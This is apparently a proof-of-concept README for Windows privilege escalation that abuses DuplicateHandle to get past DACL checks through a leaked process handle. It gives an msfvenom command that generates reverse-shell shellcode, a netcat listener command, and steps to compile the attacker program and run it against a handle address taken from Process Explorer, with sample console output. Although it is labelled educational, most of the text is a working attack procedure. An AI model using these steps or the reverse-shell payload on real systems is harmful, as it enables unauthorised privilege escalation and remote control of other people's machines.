PoC for Bypassing DACL in Windows using DuplicateHandle.
Read more about this code: Security of Handles in Windows.
This code demonstrates how to create a security hole in your program, potentially leading to privilege escalation.
Note: This is a Proof of Concept (PoC) and is for educational purposes only.
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=443 -f c -b \x00\x0a\x0d
nc -lvvp 443
Copy the generated shellcode into AttackerSource.cpp
and compile it.
unsigned char shellcode[] = "";
Execute this code: youtube Video
- Run
with Admin privileges. - Run
with normal user privileges. - Run
with Admin privileges. (vendor.exe is a vulnerable program made for testing. In the real scenario, it can be any program like openvpn.exe, vmware.exe)
Enter the Process name that you want to get Handle (e.g., powershell.exe): powershell.exe
Enter the target Process name (e.g., notepad.exe): notepad.exe
[+] SeDebugPrivilege enabled successfully.
[+] PID of powershell.exe: 8420
[+] Handle of powershell.exe is OK
[*] Run Process Explorer and find handles of notepad.exe, then find a handle named powershell.exe
and write the address of the handle in AttackerPE code...
[*] Sleep(INFINITE). After running AttackerPE.exe, press Ctrl+C to exit.
Open procexp64.exe and copy the address of the handle (powershell.exe) from notepad.exe.
with normal user privileges.
AttackerPE.exe <address> <process name>
AttackerPE.exe 0xFFFFCE890F733080 notepad.exe
Duplicating a handle in the source process requires that the source process already has that handle, meaning the DACL was checked once during the handle's Creation/Opening. When duplicating a handle from the source to the destination process, no security checks are performed, It means that even the SID of the destination process is not checked with DACL.
Windows Internals Books
Windows Kernel Programming Book